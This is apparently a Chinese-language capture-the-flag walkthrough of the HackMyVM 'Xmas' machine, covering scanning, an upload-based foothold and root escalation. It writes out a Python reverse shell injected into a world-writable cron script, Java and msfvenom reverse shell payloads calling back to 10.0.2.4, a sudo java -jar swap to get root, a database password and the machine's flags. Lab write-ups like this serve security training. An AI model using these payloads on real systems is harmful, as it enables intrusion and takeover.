XMAS
信息搜集
端口扫描
rustscan -a 10.0.2.18 -- -A
Open 10.0.2.18:22
Open 10.0.2.18:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a6:3e:0b:65:85:2c:0c:5e:47:14:a9:dd:aa:d4:8c:60 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB6Iuk2lt0gUkwd20LjylnFLItynNaqS7OuMGenbc2LNuIbmX/gZGLZtpZvdTiMtV/TQL1bAVcepNp2wlKDcOjw=
| 256 99:72:b5:6e:1a:9e:70:b3:24:e0:59:98:a4:f9:d1:25 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXAD4Qu41umJfR110GNdZPV8ldmZ8VSG0OhQyVO+Fw
80/tcp open http syn-ack Apache httpd 2.4.55
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://christmas.hmv
|_http-server-header: Apache/2.4.55 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
gobuster dir -u http://10.0.2.18/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Error: the server returns a status code that matches the provided options for non existing urls. http://10.0.2.18/96892852-b184-4e22-8560-c544262528af => 301 (Length: 339). To continue please exclude the status code or the length
查看一下网页,会发生跳转:
http://christmas.hmv/
加一个dns:
# /etc/hosts
10.0.2.18 christmas.hmv
再扫一下:
gobuster dir -u http://christmas.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/images (Status: 301) [Size: 315] [--> http://christmas.hmv/images/]
/uploads (Status: 301) [Size: 316] [--> http://christmas.hmv/uploads/]
/php (Status: 301) [Size: 312] [--> http://christmas.hmv/php/]
/css (Status: 301) [Size: 312] [--> http://christmas.hmv/css/]
/js (Status: 301) [Size: 311] [--> http://christmas.hmv/js/]
/javascript (Status: 301) [Size: 319] [--> http://christmas.hmv/javascript/]
/fonts (Status: 301) [Size: 314] [--> http://christmas.hmv/fonts/]
/server-status (Status: 403) [Size: 278]
漏洞扫描
nikto -h http://10.0.2.18
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.18
+ Target Hostname: 10.0.2.18
+ Target Port: 80
+ Start Time: 2024-04-02 00:56:24 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.55 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://christmas.hmv
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2024-04-02 00:56:36 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
漏洞挖掘
查看敏感目录
有一个可以查看上传文件的地方,寻找一下有无文件上传的地方:
找到一处问答地方:
What was Josephs job?
Carpenter
How many red nosed reindeers pull Santa's sleigh?
1
What country did Christmas Trees originate from?
Germany
How does Santa Claus go back up the Chimney to continue his journey of delivering gifts?
He jumps up through the chimney
In the TV series Simpsons, what species is Santas little helper?
Dog
打完无事发生。。。
文件上传反弹shell
找到一个上传点:
wtf?难道弄错了?再来一次:
莫名其妙又有了,连接一下:
提权
信息搜集
(remote) www-data@xmas:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@xmas:/$ pwd
/
(remote) www-data@xmas:/$ cd /var/www/html
(remote) www-data@xmas:/var/www/html$ ls -la
total 20
drwxr-xr-x 2 root root 4096 Nov 17 19:20 .
drwxr-xr-x 4 root root 4096 Nov 17 19:59 ..
-rw-r--r-- 1 root root 10671 Nov 17 19:20 index.html
(remote) www-data@xmas:/var/www/html$ cd ../;ls -la
total 16
drwxr-xr-x 4 root root 4096 Nov 17 19:59 .
drwxr-xr-x 14 root root 4096 Nov 17 19:20 ..
drwxr-xr-x 8 root root 4096 Nov 19 21:35 christmas.hmv
drwxr-xr-x 2 root root 4096 Nov 17 19:20 html
(remote) www-data@xmas:/var/www$ cd christmas.hmv/
(remote) www-data@xmas:/var/www/christmas.hmv$ ls -la
total 60
drwxr-xr-x 8 root root 4096 Nov 19 21:35 .
drwxr-xr-x 4 root root 4096 Nov 17 19:59 ..
drwxr-xr-x 2 root root 4096 Nov 17 20:22 css
drwxr-xr-x 2 root root 4096 Nov 17 20:22 fonts
drwxr-xr-x 2 root root 4096 Nov 19 16:22 images
-rw-r--r-- 1 root root 25482 Nov 19 21:26 index.php
drwxr-xr-x 2 root root 4096 Nov 17 20:22 js
drwxr-xr-x 2 root root 4096 Nov 17 20:22 php
drwxrwxrwx 2 www-data www-data 4096 Apr 2 05:28 uploads
(remote) www-data@xmas:/var/www/christmas.hmv$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:106::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:996:996:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:101:1::/var/cache/pollinate:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
syslog:x:103:109::/nonexistent:/usr/sbin/nologin
uuidd:x:104:110::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:111::/nonexistent:/usr/sbin/nologin
tss:x:106:112:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:113::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:108:114:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
alabaster:x:1000:1000:Alabaster Snowball:/home/alabaster:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:109:116:MySQL Server,,,:/nonexistent:/bin/false
santa:x:1001:1001:Santa Claus,,,:/home/santa:/bin/bash
sugurplum:x:1002:1002:Sugurplum Mary,,,:/home/sugurplum:/bin/bash
bushy:x:1003:1003:Bushy Evergreen,,,:/home/bushy:/bin/bash
pepper:x:1004:1004:Pepper Minstix,,,:/home/pepper:/bin/bash
shinny:x:1005:1005:Shinny Upatree,,,:/home/shinny:/bin/bash
wunorse:x:1006:1006:Wunorse Openslae,,,:/home/wunorse:/bin/bash
(remote) www-data@xmas:/var/www/christmas.hmv$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /script
bash: cd: /script: No such file or directory
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /scripts
bash: cd: /scripts: No such file or directory
(remote) www-data@xmas:/var/www/christmas.hmv$ cd /etc;ls -la
total 960
......(多且没有发现啥)
(remote) www-data@xmas:/etc$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount3
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/libexec/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/snapd/20290/usr/lib/snapd/snap-confine
/snap/snapd/21184/usr/lib/snapd/snap-confine
/snap/core22/1122/usr/bin/chfn
/snap/core22/1122/usr/bin/chsh
/snap/core22/1122/usr/bin/gpasswd
/snap/core22/1122/usr/bin/mount
/snap/core22/1122/usr/bin/newgrp
/snap/core22/1122/usr/bin/passwd
/snap/core22/1122/usr/bin/su
/snap/core22/1122/usr/bin/sudo
/snap/core22/1122/usr/bin/umount
/snap/core22/1122/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/1122/usr/lib/openssh/ssh-keysign
/snap/core22/1122/usr/libexec/polkit-agent-helper-1
/snap/core22/864/usr/bin/chfn
/snap/core22/864/usr/bin/chsh
/snap/core22/864/usr/bin/gpasswd
/snap/core22/864/usr/bin/mount
/snap/core22/864/usr/bin/newgrp
/snap/core22/864/usr/bin/passwd
/snap/core22/864/usr/bin/su
/snap/core22/864/usr/bin/sudo
/snap/core22/864/usr/bin/umount
/snap/core22/864/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core22/864/usr/lib/openssh/ssh-keysign
(remote) www-data@xmas:/etc$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
(remote) www-data@xmas:/etc$ cd /opt
(remote) www-data@xmas:/opt$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Nov 20 18:39 .
drwxr-xr-x 20 root root 4096 Nov 17 17:25 ..
drwxr-xr-x 2 root root 4096 Nov 20 18:39 NiceOrNaughty
(remote) www-data@xmas:/opt$ cd NiceOrNaughty/
(remote) www-data@xmas:/opt/NiceOrNaughty$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Nov 20 18:39 .
drwxr-xr-x 3 root root 4096 Nov 20 18:39 ..
-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py
(remote) www-data@xmas:/opt/NiceOrNaughty$ cat nice_or_naughty.py
import mysql.connector
import random
import os
# Check the wish lists directory
directory = "/var/www/christmas.hmv/uploads"
# Connect to the mysql database christmas
mydb = mysql.connector.connect(
host="localhost",
user="root",
password="ChristmasMustGoOn!",
database="christmas"
)
#Read the names of the wish list
def read_names(directory):
for filename in os.listdir(directory):
full_path = os.path.join(directory, filename)
if os.path.isfile(full_path):
name, ext = os.path.splitext(filename)
if any(char.isalnum() for char in name):
status = random.choice(["nice", "naughty"])
#print(f"{name} {status}")
insert_data(name, status)
os.remove(full_path)
else:
pass
elif os.path.isdir(full_path):
pass
# Insert name into the database
def insert_data(name, status):
mycursor = mydb.cursor()
sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)"
val = (name, status)
mycursor.execute(sql, val)
mydb.commit()
#Generate printable Nice and Naughty list
def generate_lists():
mycursor = mydb.cursor()
# SQL query to fetch all names and status
mycursor.execute("SELECT name, status FROM christmas")
# Separate the nice and naughty lists
nice_list = []
naughty_list = []
for (name, status) in mycursor:
if status == "nice":
nice_list.append(name)
else:
naughty_list.append(name)
parent_directory = os.path.dirname(os.getcwd())
file_path = "/home/alabaster/nice_list.txt"
# Save the nice and naughty lists to separate txt files
with open(file_path, "w") as file:
for name in nice_list:
file.write(f"{name}\n")
file_path = "/home/alabaster/naughty_list.txt"
with open(file_path, "w") as file:
for name in naughty_list:
file.write(f"{name}\n")
read_names(directory)
generate_lists()
可以看到-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py
,是可写的,在里面加入一个反弹shell,我一开始用hack_tools
的,但是没成功,又换了一个:
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' >/opt/NiceOrNaughty/nice_or_naughty.py
现在就得想办法执行这个脚本,因为是没有定时任务的,所以可能存在某些程序调用方面的,上传一个linpea.sh
:
# kali
python3 -m http.server 8888
# xmas
wget http://10.0.2.4:8888/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
刚准备回头拿终端去提取一下信息,结果发现shell已经弹回来了:
看来是会定时触发的,我咋没搜集到呢。。
上传一个pspy64
看看:
发现定时任务了。。。。。
额。。。。。
提权
信息搜集
alabaster@xmas:~$ sudo -l
sudo -l
Matching Defaults entries for alabaster on xmas:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User alabaster may run the following commands on xmas:
(ALL : ALL) ALL
(ALL) NOPASSWD: /usr/bin/java -jar
/home/alabaster/PublishList/PublishList.jar
alabaster@xmas:~$ cd /home/alabaster/PublishList/
cd /home/alabaster/PublishList/
alabaster@xmas:~/PublishList$ ls -la
ls -la
total 28
drwxrwxr-x 2 alabaster alabaster 4096 Nov 20 18:45 .
drwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 ..
-rw-rw-r-- 1 alabaster alabaster 38 Nov 20 18:45 manifest.mf
-rw-rw-r-- 1 alabaster alabaster 24 Nov 20 18:44 MANIFEST.MF
-rw-rw-r-- 1 alabaster alabaster 1760 Nov 20 18:45 PublishList.class
-rw-rw-r-- 1 alabaster alabaster 1477 Nov 20 18:45 PublishList.jar
-rw-rw-r-- 1 alabaster alabaster 1182 Nov 20 18:44 PublishList.java
发现是可写的,找一下java的反弹shell:
public class shell {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.0.2.4/1234 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}
可以自己编译一下,再上传,我直接使用msf生成了:
msfvenom -p java/shell_reverse_tcp LHOST=10.0.2.4 LPORT=1234 -f jar -o shell.jar
python3 -m http.server 8888
mv PublishList.jar PublishList.jar.bak
mv shell.jar PublishList.jar
sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar
# 这里要用绝对路径哦
然后就会弹一个rootshell
到1234
监听端口上面去:
[02:15:50] Welcome to pwncat 🐈! __main__.py:164[02:20:14] received connection from 10.0.2.18:39176 bind.py:84[02:20:15] 0.0.0.0:1234: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957 10.0.2.18:39176: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@xmas:/home/alabaster/PublishList# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
(remote) root@xmas:/home/alabaster/PublishList# cd ../;ls -la
total 60
drwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 .
drwxr-xr-x 9 root root 4096 Nov 19 22:29 ..
-rw------- 1 alabaster alabaster 791 Nov 20 19:28 .bash_history
-rw-r--r-- 1 alabaster alabaster 220 Jan 7 2023 .bash_logout
-rw-r--r-- 1 alabaster alabaster 3771 Jan 7 2023 .bashrc
drwx------ 3 alabaster alabaster 4096 Nov 19 11:07 .cache
drwxrwxr-x 4 alabaster alabaster 4096 Nov 19 11:08 .local
-rw-rw-r-- 1 alabaster alabaster 43 Apr 2 05:38 naughty_list.txt
-rw-rw-r-- 1 alabaster alabaster 35 Apr 2 05:38 nice_list.txt
drwxrwxr-x 2 alabaster alabaster 4096 Nov 19 21:50 NiceOrNaughty
-rw-r--r-- 1 alabaster alabaster 807 Jan 7 2023 .profile
drwxrwxr-x 2 alabaster alabaster 4096 Apr 2 06:18 PublishList
-rw-rw-r-- 1 alabaster alabaster 66 Nov 19 21:43 .selected_editor
drwx------ 2 alabaster alabaster 4096 Nov 17 17:32 .ssh
-rw-r--r-- 1 alabaster alabaster 0 Nov 17 17:34 .sudo_as_admin_successful
-rw-rw---- 1 alabaster alabaster 849 Nov 19 09:08 user.txt
(remote) root@xmas:/home/alabaster# cat user.txt
||::|:|| .--------,
|:||:|:| |_______ / .-.
||::|:|| ."` ___ `". {\('v')/}
\\\/\///: .'` `'. ;____`( )'___________________________
\====/ './ o o \|~ ^" "^ //
\\// | ())) . | Merry Christmas! \
|| \ `.__.' /| //
|| _{``-.___.-'\| Flag: HMV{7bMJ6js7guhQadYDTmBt} \
|| _." `-.____.-'`| ___ //
||` __ \ |___/ \______________________________\
."|| (__) \ \| /
/ `\/ __ vvvvv'\___/
| | (__) |
\___/\ /
|| | .___. |
|| | | |
||.-' | '-.
|| | )
||----------'---------'
(remote) root@xmas:/home/alabaster# cat /root/root.txt
__,_,_,___) _______
(--| | | (--/ ),_) ,_)
| | | _ ,_,_ | |_ ,_ ' , _|_,_,_, _ ,
__| | | (/_| | (_| | | || |/_)_| | | |(_|/_)___,
( |___, ,__| \____) |__, |__,
| _...._
\ _ / .::o:::::.
(\o/) .:::'''':o:.
--- / \ --- :o:_ _:::
>*< `:}_>()<_{:'
>0<@< @ `'//\\'` @
>>>@<<* @ # // \\ # @
>@>*<0<<< __#_#____/'____'\____#_#__
>*>>@<<<@<< [__________________________]
>@>>0<<<*<<@< |=_- .-/\ /\ /\ /\--. =_-|
>*>>0<<@<<<@<<< |-_= | \ \\ \\ \\ \ |-_=-|
>@>>*<<@<>*<<0<*< |_=-=| / // // // / |_=-_|
\*/ >0>>*<<@<>0><<*<@<< |=_- |`-'`-'`-'`-' |=_=-|
___\\U//___ >*>>@><0<<*>>@><*<0<< | =_-| o o |_==_|
|\\ | | \\| >@>>0<*<<0>>@<<0<<<*<@< |=_- | ! ( ! |=-_=|
| \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*< _|-,-=| ! ). ! |-_-=|_
|\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<@</=-((=_| ! __(:')__ ! |=_==_-\
|\\_|_|&&_// ||*.*.*.*|_\\db//__ (\_/)-=))-|/^\=^=^^=^=/^\| _=-_-_\
""""|'.'.'.|~~|.*.*.*| ____|_ =('.')=// ,------------.
|'.'.'.| ^^^^^^|____|>>>>>>| ( ~~~ )/ (((((((())))))))
~~~~~~~~ '""""`------' `w---w` `------------'
Flag HMV{GUbM4sBXzvwf7eC9bNL4}